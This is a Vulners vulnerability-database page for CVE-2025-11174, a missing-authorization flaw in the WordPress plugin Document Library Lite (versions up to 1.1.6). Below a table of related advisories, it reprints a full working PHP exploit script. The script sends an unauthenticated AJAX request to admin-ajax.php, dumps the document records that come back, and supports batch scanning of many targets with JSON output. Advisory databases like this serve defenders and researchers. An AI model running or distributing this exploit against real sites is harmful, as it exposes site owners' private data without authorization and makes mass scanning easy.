Vulners
Lucene search
📄 WordPress Document Library Lite 1.1.6 Information Disclosure
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for CVE-2025-11174 | 2 Nov 202506:57 | – | githubexploit |
 | CVE-2025-11174 | 2 Nov 202505:57 | – | circl |
 | WordPress plugin Document Library Lite 授权问题漏洞 | 1 Nov 202500:00 | – | cnnvd |
 | WordPress Document Library Lite plugin improper authorization vulnerability | 5 Nov 202500:00 | – | cnvd |
 | CVE-2025-11174 | 1 Nov 202501:47 | – | cve |
 | CVE-2025-11174 Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | 1 Nov 202501:47 | – | cvelist |
 | EUVD-2025-37407 | 1 Nov 202503:30 | – | euvd |
 | CVE-2025-11174 | 1 Nov 202502:15 | – | nvd |
 | WordPress Document Library Lite plugin <= 1.1.6 - Missing Authorization to Sensitive Information Exposure vulnerability | 3 Nov 202522:17 | – | patchstack |
 | PT-2025-44695 | 1 Nov 202500:00 | – | ptsecurity |
10
=============================================================================================================================================
| # Title : WordPress Document Library Lite 1.1.6 Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/document-library-lite/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211137/ & CVE-2025-11174
[+] Summary : The WordPress plugin “Document Library Lite” fails to restrict access to internal AJAX API endpoint allowing unauthenticated attackers to fetch document records exposing sensitive metadata.
[+] POC : * Usage: php poc.php https://victim.com
php poc.php https://victim.com output.json
<?php
/**
* CVE-2025-11174 WordPress PoC
* Fixed Version By Indoushka
*/
class Colors {
const R="\033[0;31m"; const G="\033[0;32m"; const Y="\033[1;33m";
const B="\033[0;34m"; const M="\033[0;35m"; const C="\033[0;36m";
const N="\033[0m";
}
function banner() {
echo Colors::R."
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
".Colors::N."
CVE-2025-11174 — Document Library Lite
Unauthenticated Information Disclosure PoC
==========================================
";
}
function normalize($u){
if(!preg_match('#^https?://#i',$u)) $u="https://".$u;
return rtrim($u,"/");
}
function poc($t,$v=false){
$t=normalize($t);
$u=$t."/wp-admin/admin-ajax.php";
echo Colors::G."[+] Target: ".Colors::N.$t.PHP_EOL;
echo " Endpoint: $u".PHP_EOL.PHP_EOL;
$h=[
"User-Agent: CVE-2025-11174-Proof",
"Content-Type: application/x-www-form-urlencoded"
];
$p="action=dll_load_posts";
$c=curl_init();
curl_setopt_array($c,[
CURLOPT_URL=>$u,
CURLOPT_POST=>true,
CURLOPT_POSTFIELDS=>$p,
CURLOPT_HTTPHEADER=>$h,
CURLOPT_RETURNTRANSFER=>true,
CURLOPT_TIMEOUT=>10,
CURLOPT_FOLLOWLOCATION=>true,
CURLOPT_SSL_VERIFYPEER=>false
]);
$r=curl_exec($c);
$s=curl_getinfo($c,CURLINFO_HTTP_CODE);
$e=curl_error($c);
curl_close($c);
echo Colors::G."[+] HTTP: ".Colors::N.$s.PHP_EOL.PHP_EOL;
if($e){
echo Colors::R."[!] CURL ERROR: $e".Colors::N.PHP_EOL;
return ["vuln"=>false];
}
if($s!=200){
echo Colors::Y."[!] Unexpected status".Colors::N.PHP_EOL;
return ["vuln"=>false];
}
$j=json_decode($r,true);
if(json_last_error()!==JSON_ERROR_NONE){
echo Colors::G."[+] No JSON returned — not vulnerable".Colors::N.PHP_EOL;
return ["vuln"=>false];
}
if(isset($j["data"]) || isset($j["recordsTotal"])){
echo Colors::R."[!!!] VULNERABLE".Colors::N.PHP_EOL.PHP_EOL;
echo Colors::G."[+] Retrieved Data:".Colors::N.PHP_EOL;
echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL;
return ["vuln"=>true,"data"=>$j];
}
echo Colors::G."[+] Not vulnerable".Colors::N.PHP_EOL;
if($v){
echo Colors::Y."[Verbose] Data:".Colors::N.PHP_EOL;
echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL;
}
return ["vuln"=>false,"data"=>$j];
}
function isPCNTL(){
return function_exists("pcntl_signal") && function_exists("pcntl_async_signals");
}
function main(){
global $argv;
$opts=getopt("vho:",["verbose","help","output:","batch","no-banner"]);
if(!isset($opts["no-banner"])) banner();
if(isset($opts["h"])||isset($opts["help"])){
echo "Usage: php ".basename($argv[0])." [OPTIONS] TARGET\n\n";
exit;
}
$verbose=(isset($opts["v"])||isset($opts["verbose"]));
// Last standalone argument (target)
$args=$argv;
array_shift($args);
foreach($args as $a){
if($a[0]!="-"){$target=$a;break;}
}
if(empty($target)){
echo Colors::R."[!] ERROR: No Target Provided".Colors::N.PHP_EOL;
exit(1);
}
if(isset($opts["batch"])){
$file=$target;
if(!file_exists($file)){
echo Colors::R."[!] ERROR: Batch file not found: $file".Colors::N.PHP_EOL;
exit(1);
}
$list=file($file,FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES);
echo Colors::G."[+] Loaded ".count($list)." targets".Colors::N.PHP_EOL.PHP_EOL;
$res=[];
foreach($list as $x){
echo Colors::C."[~] Testing $x".Colors::N.PHP_EOL;
$r=poc($x,$verbose);
$r["target"]=$x;
$res[]=$r;
echo PHP_EOL;
}
if(isset($opts["o"])||isset($opts["output"])){
$o=$opts["o"]??$opts["output"];
file_put_contents($o,json_encode($res,JSON_PRETTY_PRINT));
echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL;
}
exit;
}
$r=poc($target,$verbose);
if(isset($opts["o"])||isset($opts["output"])){
$o=$opts["o"]??$opts["output"];
file_put_contents($o,json_encode($r,JSON_PRETTY_PRINT));
echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL;
}
exit($r["vuln"]?0:1);
}
if(isPCNTL()){
pcntl_async_signals(true);
pcntl_signal(SIGINT,function(){
echo PHP_EOL.Colors::Y."[!] Interrupted".Colors::N.PHP_EOL;
exit(130);
});
}
main();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00105
SSVC